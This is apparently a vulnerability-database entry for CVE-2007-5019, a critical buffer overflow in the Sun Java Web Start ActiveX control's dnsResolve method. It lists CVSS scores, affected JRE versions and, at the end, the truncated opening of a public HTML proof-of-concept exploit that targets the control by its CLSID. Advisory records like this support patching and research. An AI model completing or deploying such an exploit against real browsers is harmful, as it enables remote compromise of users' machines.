10
CVSSv2

CVE-2007-5019

Published: 20/09/2007 Updated: 29/09/2017
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Buffer overflow in the Sun Java Web Start ActiveX control in Java Runtime Environment (JRE) 1.6.0_X allows remote malicious users to have an unknown impact via a long argument to the dnsResolve (isInstalled.dnsResolve) method.

Vulnerable Product Search on Vulmon Subscribe to Product

sun java web start

sun jre 1.6.0_0

sun jre 1.6.0_10

sun sdk 1.3.0

Exploits

<html> <body> <center> Sun (jre160_X) isInstalleddnsResolve function overflow PoC<br> Bug founded and code released by Yag Kohha <br> Greetz to: <br> Shinnai, Str0ke <br> </center> <object classid="CLSID:5852F5ED-8BF4-11D4-A245-0080C6F74284" id="target"></OBJECT> <SCRIPT language=" ...